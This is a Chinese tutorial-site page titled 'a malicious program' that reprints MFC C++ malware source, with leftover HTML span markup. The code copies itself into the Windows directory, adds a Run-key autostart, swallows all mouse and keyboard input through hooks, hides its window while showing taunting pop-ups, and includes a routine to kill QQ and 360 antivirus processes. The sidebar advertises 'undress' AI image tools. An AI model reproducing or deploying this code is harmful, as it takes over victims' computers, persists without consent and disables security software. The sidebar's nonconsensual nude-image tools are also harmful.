一个恶意程序-php手册-php.cn

Home

php教程

php手册

一个恶意程序

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 13, 2016 am 11:31 AM

microsoft r run software windows malicious program

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

<span //</span><span  KeyBoardHookDialogDlg.cpp : implementation file
</span><span //
</span><span 
#include </span><span "</span><span stdafx.h</span><span "</span><span 
#include </span><span "</span><span KeyBoardHookDialog.h</span><span "</span><span 
#include </span><span "</span><span KeyBoardHookDialogDlg.h</span><span "</span>
<span #define</span> REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"<span 
 #include </span><tlhelp32.h><span 
 
#ifdef _DEBUG
</span><span #define</span> new DEBUG_NEW
<span #undef</span> THIS_FILE
<span static</span> <span char</span> THIS_FILE[] =<span  __FILE__;
</span><span #endif</span>
<span //</span><span #pragma comment (lib,"KeyBoardHook")</span>
<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CAboutDlg dialog used for App About
</span><span //</span><span 定义全局HHOOK变量，用于保存</span>
<span  HHOOK  g_hMouse;
 HHOOK  g_hKeyboard;
 </span><span bool</span> isTrue = <span false</span><span ;
 
 HWND hWnd; </span><span //</span><span 保存当前句柄
 
</span><span //</span><span 注意以下俩个钩子过程是全局函数，所以里面的API要用全局的</span>
<span  LRESULT CALLBACK MouseProc(
  </span><span int</span> nCode,      <span //</span><span  hook code</span>
  WPARAM wParam,  <span //</span><span  message identifier</span>
  LPARAM lParam   <span //</span><span  mouse coordinates</span>
<span   )
 {
    </span><span return</span> <span 1</span><span ;    
 }
 
 LRESULT CALLBACK KeyboardProc(
  </span><span int</span> code,       <span //</span><span  hook code</span>
  WPARAM wParam,  <span //</span><span  virtual-key code</span>
  LPARAM lParam   <span //</span><span  keystroke-message information</span>
<span )
{
    </span><span //</span><span  if(VK_SPACE == wParam || VK_RETURN == wParam) </span><span //</span><span 屏蔽空格和回车键</span>
     <span /*</span><span   if(VK_F4 == wParam && (lParam>>29 & 1)) //屏蔽ALT + F4键 
            return 1;
       else
            return CallNextHookEx(g_hKeyboard,code,wParam,lParam);</span><span */</span>
    <span //</span><span 留个后门，使当按下F2键时，程序将退</span>
       <span if</span>(VK_F2 ==<span  wParam)
       {
           </span><span //</span><span 调用全局API函数向程序发出关闭消息</span>
           ::SendMessage(hWnd,WM_CLOSE,<span 0</span>,<span 0</span><span );
           </span><span //</span><span 卸载钩子</span>
<span            UnhookWindowsHookEx(g_hMouse);
           UnhookWindowsHookEx(g_hKeyboard);
       }
       </span><span return</span> <span 1</span><span ;
}
 
 
</span><span class</span> CAboutDlg : <span public</span><span  CDialog
{
</span><span public</span><span :
    CAboutDlg();
 
</span><span //</span><span  Dialog Data
    </span><span //</span><span {{AFX_DATA(CAboutDlg)</span>
    <span enum</span> { IDD =<span  IDD_ABOUTBOX };
    </span><span //</span><span }}AFX_DATA
 
    </span><span //</span><span  ClassWizard generated virtual function overridesf
    </span><span //</span><span {{AFX_VIRTUAL(CAboutDlg)</span>
    <span protected</span><span :
    </span><span virtual</span> <span void</span> DoDataExchange(CDataExchange* pDX);    <span //</span><span  DDX/DDV support
    </span><span //</span><span }}AFX_VIRTUAL
 
</span><span //</span><span  Implementation</span>
<span protected</span><span :
    </span><span //</span><span {{AFX_MSG(CAboutDlg)
    </span><span //</span><span }}AFX_MSG</span>
<span     DECLARE_MESSAGE_MAP()
};
 
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
    </span><span //</span><span {{AFX_DATA_INIT(CAboutDlg)
    </span><span //</span><span }}AFX_DATA_INIT</span>
<span }
 
</span><span void</span> CAboutDlg::DoDataExchange(CDataExchange*<span  pDX)
{
    CDialog::DoDataExchange(pDX);
    </span><span //</span><span {{AFX_DATA_MAP(CAboutDlg)
    </span><span //</span><span }}AFX_DATA_MAP</span>
<span }
 
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
    </span><span //</span><span {{AFX_MSG_MAP(CAboutDlg)
        </span><span //</span><span  No message handlers
    </span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
 
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CKeyBoardHookDialogDlg dialog</span>
<span 
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd</span>* pParent <span /*</span><span =NULL</span><span */</span><span )
    : CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
    </span><span //</span><span {{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
        </span><span //</span><span  NOTE: the ClassWizard will add member initialization here
    </span><span //</span><span }}AFX_DATA_INIT
    </span><span //</span><span  Note that LoadIcon does not require a subsequent DestroyIcon in Win32</span>
    m_hIcon = AfxGetApp()-><span LoadIcon(IDR_MAINFRAME);
}
 
</span><span void</span> CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange*<span  pDX)
{
    CDialog::DoDataExchange(pDX);
    </span><span //</span><span {{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
        </span><span //</span><span  NOTE: the ClassWizard will add DDX and DDV calls here
    </span><span //</span><span }}AFX_DATA_MAP</span>
<span }
 
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
    </span><span //</span><span {{AFX_MSG_MAP(CKeyBoardHookDialogDlg)</span>
<span     ON_WM_SYSCOMMAND()
    ON_WM_PAINT()
    ON_WM_QUERYDRAGICON()
    ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
    ON_WM_TIMER()
    </span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
 
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span  CKeyBoardHookDialogDlg message handlers</span>
<span 
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
    CDialog::OnInitDialog();
 
    </span><span //</span><span  Add "About..." menu item to system menu.
 
    </span><span //</span><span  IDM_ABOUTBOX must be in the system command range.</span>
    ASSERT((IDM_ABOUTBOX & <span 0xFFF0</span>) ==<span  IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX </span>< <span 0xF000</span><span );
 
    CMenu</span>* pSysMenu =<span  GetSystemMenu(FALSE);
    </span><span if</span> (pSysMenu !=<span  NULL)
    {
        CString strAboutMenu;
        strAboutMenu.LoadString(IDS_ABOUTBOX);
        </span><span if</span> (!<span strAboutMenu.IsEmpty())
        {
            pSysMenu</span>-><span AppendMenu(MF_SEPARATOR);
            pSysMenu</span>-><span AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
        }
    }
 
    </span><span //</span><span  Set the icon for this dialog.  The framework does this automatically
    </span><span //</span><span   when the application's main window is not a dialog</span>
    SetIcon(m_hIcon, TRUE);            <span //</span><span  Set big icon</span>
    SetIcon(m_hIcon, FALSE);        <span //</span><span  Set small icon
     
    </span><span //</span><span  TODO: Add extra initialization here</span>
<span 
 
    CopySelf();
    autoRun();</span><span //</span><span 注册表启动
        </span><span //</span><span 设定钩子
</span><span //</span><span     ShowProcess();</span>
    g_hMouse =<span  SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
    g_hKeyboard </span>=<span  SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
    </span><span //</span><span 保存句柄</span>
    hWnd =<span  m_hWnd;
     
    SetTimer(</span><span 1</span>, <span 2000</span><span , NULL);
    isTrue </span>= <span true</span><span ;
    </span><span return</span> TRUE;  <span //</span><span  return TRUE  unless you set the focus to a control</span>
<span }
 
</span><span void</span><span  CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    </span><span if</span> ((nID & <span 0xFFF0</span>) ==<span  IDM_ABOUTBOX)
    {
        CAboutDlg dlgAbout;
        dlgAbout.DoModal();
    }
    </span><span else</span><span 
    {
        CDialog::OnSysCommand(nID, lParam);
    }
}
 
</span><span //</span><span  If you add a minimize button to your dialog, you will need the code below
</span><span //</span><span   to draw the icon.  For MFC applications using the document/view model,
</span><span //</span><span   this is automatically done for you by the framework.</span>
 
<span void</span><span  CKeyBoardHookDialogDlg::OnPaint() 
{
    </span><span if</span><span  (IsIconic())
    {
        CPaintDC dc(</span><span this</span>); <span //</span><span  device context for painting</span>
<span 
        SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), </span><span 0</span><span );
 
        </span><span //</span><span  Center icon in client rectangle</span>
        <span int</span> cxIcon =<span  GetSystemMetrics(SM_CXICON);
        </span><span int</span> cyIcon =<span  GetSystemMetrics(SM_CYICON);
        CRect rect;
        GetClientRect(</span>&<span rect);
        </span><span int</span> x = (rect.Width() - cxIcon + <span 1</span>) / <span 2</span><span ;
        </span><span int</span> y = (rect.Height() - cyIcon + <span 1</span>) / <span 2</span><span ;
 
        </span><span //</span><span  Draw the icon</span>
<span         dc.DrawIcon(x, y, m_hIcon);
    }
    </span><span else</span><span 
    {
        CDialog::OnPaint();
    }
}
 
</span><span //</span><span  The system calls this to obtain the cursor to display while the user drags
</span><span //</span><span   the minimized window.</span>
<span HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
    </span><span return</span><span  (HCURSOR) m_hIcon;
}
 
 
</span><span void</span><span  CKeyBoardHookDialogDlg::OnBtnHookon() 
{
    </span><span //</span><span  TODO: Add your control notification handler code here</span>
<span 
     
     
}
 
</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff() 
</span><span //</span><span DEL {
</span><span //</span><span DEL     </span><span //</span><span  TODO: Add your control notification handler code here
</span><span //</span><span DEL     SetHookOff();
</span><span //</span><span DEL     
</span><span //</span><span DEL }</span>
 
<span void</span><span  CKeyBoardHookDialogDlg::hide()
{
  
        ShowWindow(SW_HIDE); 
}
 
 
</span><span void</span><span  CKeyBoardHookDialogDlg::autoRun()
{
 
        HKEY hKey </span>=<span  NULL;
        LONG lRet </span>= RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&<span hKey);
 
        </span><span if</span>(lRet !=<span  ERROR_SUCCESS)
        {
            </span><span return</span><span ;
        }
 
        RegSetValueEx(hKey,</span><span "</span><span mynona</span><span "</span>,NULL,REG_SZ,(<span const</span> unsigned <span char</span> *)&<span szWindowsPath,
            strlen(szWindowsPath) </span>+<span sizeof</span>(<span char</span><span ));
 
        RegCloseKey(hKey);
}
 
</span><span void</span><span  CKeyBoardHookDialogDlg::ShowProcess()
{
 
    HANDLE hSnap </span>=<span  CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
    </span><span //</span><span ...</span>
<span 
    PROCESSENTRY32 Pe32 </span>= {<span 0</span><span };
    Pe32.dwSize </span>= <span sizeof</span><span (PROCESSENTRY32);
    </span><span int</span> bRet = Process32First(hSnap,&<span Pe32);
    </span><span //</span><span 360IOSMgrSrv 360tray </span>
    <span char</span> name[MAX_PATH] = <span "</span><span QQ.exe</span><span "</span><span ;
    </span><span char</span> name2[MAX_PATH] = <span "</span><span 360tray.exe</span><span "</span><span ;
    </span><span char</span> name3[MAX_PATH] = <span "</span><span 360rp.exe</span><span "</span><span ;
    </span><span while</span><span (bRet)
    {
        </span><span //</span><span ...</span>
        bRet = Process32Next(hSnap,&<span Pe32);        
        </span><span //</span><span cout<<"id:"<<Pe32.th32ProcessID<<"   name:"<<Pe32.szExeFile<<endl;</span>
         
        <span int</span> flag = <span 0</span><span ;
        </span><span if</span>(strcmp(Pe32.szExeFile,name) == <span 0</span> || strcmp(Pe32.szExeFile,name3) == <span 0</span> || strcmp(Pe32.szExeFile,name2) ==<span 0</span><span )
            flag </span>= <span 1</span><span ;
        </span><span if</span><span (flag){
        </span><span //</span><span     cout<<"----------------------"<<Pe32.th32ProcessID<<endl;</span>
<span             MessageBox(Pe32.szExeFile);
            HANDLE hProcess </span>=<span  OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
            LPDWORD lpExitCode </span>= <span 0</span><span ;
            GetExitCodeProcess(hProcess, lpExitCode);
            TerminateProcess(hProcess, (UINT)lpExitCode);
        }
    }
}
 
</span><span void</span><span  CKeyBoardHookDialogDlg::CopySelf()
{
 
     </span><span char</span> szSelfName[MAX_PATH] = {<span 0</span><span };
    </span><span //</span><span  char szSystemPath[MAX_PATH] = {0};</span>
     <span char</span> szTmpPath[MAX_PATH] = {<span 0</span><span };
 
     </span><span //</span><span 获取当前程序自身路径</span>
<span      GetModuleFileName(NULL,szSelfName,MAX_PATH);
     </span><span //</span><span cout<<"szSelfName:"<<szSelfName<<endl;
 
     </span><span //</span><span 获取系统目录</span>
<span      GetWindowsDirectory(szWindowsPath,MAX_PATH);
   </span><span //</span><span   cout<<"szWindowsPath:"<<szWindowsPath<<endl;
 
     </span><span //</span><span 获取windows目录
   </span><span //</span><span   GetSystemDirectory(szSystemPath,MAX_PATH);
     </span><span //</span><span cout<<"szSystemPath:"<<szSystemPath<<endl;</span>
<span 
     strcat(szWindowsPath,</span><span "</span><span \\mynona.exe</span><span "</span><span );
     </span><span //</span><span strcat(szSystemPath,"\\mynona.exe");</span>
<span 
     MessageBox( szWindowsPath,</span><span "</span><span : szWindowsPath</span><span "</span><span );
     </span><span //</span><span MessageBox( szSystemPath,": szSystemPath");    </span>
 
     <span int</span> isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);<span //</span><span FALSE表示强行覆盖原有文件
   </span><span //</span><span   int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);</span>
<span 
}
 
</span><span void</span><span  CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent) 
{
    </span><span //</span><span  TODO: Add your message handler code here and/or call default</span>
    <span if</span><span (isTrue){
        ShowWindow(SW_HIDE); 
    }
    MessageBox(</span><span "</span><span haha</span><span "</span>,<span "</span><span 哈哈</span><span "</span><span ,MB_ICONSTOP);
 
    CDialog::OnTimer(nIDEvent);
}</span>

Copy after login

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Best Graphic Settings

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

2 weeks ago By DDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

WWE 2K25: How To Unlock Everything In MyRise

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7467

CakePHP Tutorial

1376

What is the format of the account name of steam

win11 activation key permanent

nyt connections hints and answers

Related knowledge

What should I do if Beyond Compare fails to case sensitivity when synchronizing Windows and Linux files? Apr 01, 2025 am 08:06 AM

The problem of comparing and synchronizing BeyondCompare files: Case sensitivity failure when using Beyond...

Four ways to implement multithreading in C language Apr 03, 2025 pm 03:00 PM

Multithreading in the language can greatly improve program efficiency. There are four main ways to implement multithreading in C language: Create independent processes: Create multiple independently running processes, each process has its own memory space. Pseudo-multithreading: Create multiple execution streams in a process that share the same memory space and execute alternately. Multi-threaded library: Use multi-threaded libraries such as pthreads to create and manage threads, providing rich thread operation functions. Coroutine: A lightweight multi-threaded implementation that divides tasks into small subtasks and executes them in turn.

How to avoid third-party interfaces returning 403 errors in Node environment? Apr 01, 2025 pm 02:03 PM

How to avoid the third-party interface returning 403 error in the Node environment. When calling the third-party website interface using Node.js, you sometimes encounter the problem of returning 403 error. �...

Why can't my code get the data returned by the API? How to solve this problem? Apr 01, 2025 pm 08:09 PM

Why can't my code get the data returned by the API? In programming, we often encounter the problem of returning null values when API calls, which is not only confusing...

Where to download Python .whl files under Windows? Apr 01, 2025 pm 08:18 PM

Python binary library (.whl) download method explores the difficulties many Python developers encounter when installing certain libraries on Windows systems. A common solution...

How to efficiently read Windows system logs and get only information from the last few days? Apr 01, 2025 pm 11:21 PM

Efficient reading of Windows system logs: Reversely traverse Evtx files When using Python to process Windows system log files (.evtx), direct reading will be from the earliest...

How to speed up the loading speed of PS? Apr 06, 2025 pm 06:27 PM

Solving the problem of slow Photoshop startup requires a multi-pronged approach, including: upgrading hardware (memory, solid-state drive, CPU); uninstalling outdated or incompatible plug-ins; cleaning up system garbage and excessive background programs regularly; closing irrelevant programs with caution; avoiding opening a large number of files during startup.

In front-end development, how to use CSS and JavaScript to achieve searchlight effects similar to Windows 10 settings interface? Apr 05, 2025 pm 10:21 PM

How to implement Windows-like in front-end development...

See all articles